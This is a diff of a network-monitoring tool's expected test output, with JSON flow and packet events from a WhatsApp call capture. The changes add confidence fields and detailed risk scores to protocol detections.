+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa90wAAEARRV3AqAIEHw1bMMk+DZYAhs2+AAMAaiESpEIAAJhbSrigEVALo05AAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACahRkAAEARwwDAqAIEHw1PwMk+DZYAhkfEAAMAaiESpEIAADsyhsRFd5d2aQVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaCdEAAEARPknAqAIEHw1PwMk+DZYAhkfEAAMAaiESpEIAADsyhsRFd5d2aQVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1432582238792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaWjwAAEAR4G3AqAIEHw1dMMk+DZYAhleUAAMAaiESpEIAAOhOyhcXEAbXGlxAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaWaMAAEAR4QbAqAIEHw1dMMk+DZYAhleUAAMAaiESpEIAAOhOyhcXEAbXGlxAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1432582238792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACagnUAAEARzDTAqAIEHw1JMMk+DZYAhhoqAAMAaiESpEIAABpmz0oddRqYGlZAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACakcIAAEARvOfAqAIEHw1JMMk+DZYAhhoqAAMAaiESpEIAABpmz0oddRqYGlZAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1432582238857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582238857,"pkt":"APS5Jrv0xiwDYGpkCABFAABI28gAAFURZ\/MfDUAwwKgCBA2WyT4ANKxZAQMAGCESpEIAAN5oNK0Wc\/NrxVUAIAAIAAGRdm4xsYdAAgAIAAABTYyOMnU="}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1432582238878,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582238878,"pkt":"APS5Jrv0xiwDYGpkCABFAABIJlcAAFMRBGUfDVswwKgCBA2WyT4ANP0WAQMAGCESpEIAAJhbSrigEVALo04AIAAIAAGRdm4xsYdAAgAIAAABTYyOMoM="}
@@ -145,10 +145,10 @@
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582245576,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/ZBAAEAGBN\/AqAIEEaxkCMAPAbv4S5DkkuqnVFAQ\/\/\/yOQAA"}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1432582246280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1432582246280,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISN8UAAEARusXAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1432582247125,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582247125,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIu7MAAEAROKHAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0VdFAAEAGLmvAqAIEXT6WncAqAbtp\/2UpB8hbNoARIADD5gAAAQEICi36g7kNLSlg"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -163,77 +163,77 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582250618,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAotpxAAEAGIdPAqAIEEaeODcAwAbsLr3wlAQ2ywVAQ\/\/9P5QAA"}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1432582258587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582258587,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIJ6AAAEARMxjAqAIEAcJav8k+65gANBimAAEAGCESpEI2xNtJG9sue8sIM0EACAAU5G1owzzn9g07DgjX0q3CWkGBWA0="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1432582258730,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582258730,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIG0oAAEARj7DAqAIEW\/2wQck+JIAANKXrAAEAGCESpELdaIZ9jcVOA62tiygACAAUhE7qa\/gs1xldMnASKkUclFJWums="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1432582258815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582258815,"pkt":"APS5Jrv0xiwDYGpkCABFAABI4nIAAC8R2kdb\/bBBwKgCBCSAyT4ANOAtAQEAGCESpELdaIZ9jcVOA62tiygACAAUsHui2xBS6T5qw9kAv9V6SryCnE8="}
